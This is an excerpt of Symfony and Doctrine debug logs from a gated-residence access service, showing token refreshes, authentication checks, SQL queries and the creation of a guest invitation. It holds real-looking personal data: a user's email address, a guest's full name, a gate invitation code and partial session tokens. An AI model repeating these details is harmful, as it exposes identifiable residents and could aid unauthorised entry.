  9125. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9126. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9127. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9128. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9129. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9130. [2025-12-21 00:49:37] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9131. [2025-12-21 00:49:37] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9132. [2025-12-21 00:50:04] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  9133. [2025-12-21 00:50:04] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  9134. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["9475b21af35afb95ae7be847dc [...]"] []
  9135. [2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
  9136. [2025-12-21 00:50:04] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"b0a4a4a06dc850d0f64ce4e341 [...]","3":"2025-12-21 01:20:04","4":"","5":398,"6":"[]"} []
  9137. [2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
  9138. [2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
  9139. [2025-12-21 00:50:04] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"7967d8158dd3144b86d148b136 [...]","3":"2026-02-19 00:50:04","4":"","5":398,"6":"[]"} []
  9140. [2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
  9141. [2025-12-21 00:50:04] doctrine.DEBUG: "START TRANSACTION" [] []
  9142. [2025-12-21 00:50:04] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"9475b21af35afb95ae7be847dc [...]"] []
  9143. [2025-12-21 00:50:04] doctrine.DEBUG: "COMMIT" [] []
  9144. [2025-12-21 00:50:04] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9145. [2025-12-21 00:50:04] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9146. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
  9147. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9148. [2025-12-21 00:50:04] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9149. [2025-12-21 00:50:04] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9150. [2025-12-21 00:50:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9151. [2025-12-21 00:50:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9152. [2025-12-21 00:50:04] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9153. [2025-12-21 00:50:04] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9154. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9155. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9156. [2025-12-21 00:50:04] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9157. [2025-12-21 00:50:04] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9158. [2025-12-21 00:50:04] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9159. [2025-12-21 00:50:04] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9160. [2025-12-21 00:50:05] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9161. [2025-12-21 00:50:05] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9162. [2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9163. [2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9164. [2025-12-21 00:50:05] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9165. [2025-12-21 00:50:05] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9166. [2025-12-21 00:50:14] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9167. [2025-12-21 00:50:14] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9168. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9169. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9170. [2025-12-21 00:50:14] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9171. [2025-12-21 00:50:14] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9172. [2025-12-21 00:50:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9173. [2025-12-21 00:50:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9174. [2025-12-21 00:50:14] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9175. [2025-12-21 00:50:14] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9176. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9177. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9178. [2025-12-21 00:50:14] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9179. [2025-12-21 00:50:14] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9180. [2025-12-21 00:50:14] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9181. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9182. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9183. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9184. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9185. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9186. [2025-12-21 00:50:14] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9187. [2025-12-21 00:50:14] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9188. [2025-12-21 00:50:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"22b906","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/22b906","method":"GET"} []
  9189. [2025-12-21 00:50:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar","method":"GET"} []
  9190. [2025-12-21 00:50:28] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  9191. [2025-12-21 00:50:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9192. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9193. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9194. [2025-12-21 00:50:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9195. [2025-12-21 00:50:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9196. [2025-12-21 00:50:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9197. [2025-12-21 00:50:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9198. [2025-12-21 00:50:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9199. [2025-12-21 00:50:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9200. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9201. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9202. [2025-12-21 00:50:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9203. [2025-12-21 00:50:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9204. [2025-12-21 00:50:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9205. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9206. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9207. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9208. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9209. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  9210. [2025-12-21 00:50:28] doctrine.DEBUG: "START TRANSACTION" [] []
  9211. [2025-12-21 00:50:28] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"a8c27470-4025-4113-b368-a4 [...]","2":1,"3":"2025-12-21 00:50:28","4":"2025-12-21 00:50:28","5":"René","6":"Zapata Arjona","7":"471088","8":"/invitation/627e4c44e50daf [...]","9":"2","10":"1","11":"2025-12-21 16:00:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  9212. [2025-12-21 00:50:28] doctrine.DEBUG: "COMMIT" [] []
  9213. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9214. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  9215. [2025-12-21 00:50:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9216. [2025-12-21 00:50:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  9217. [2025-12-21 00:50:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9218. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9219. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9220. [2025-12-21 00:50:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9221. [2025-12-21 00:50:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
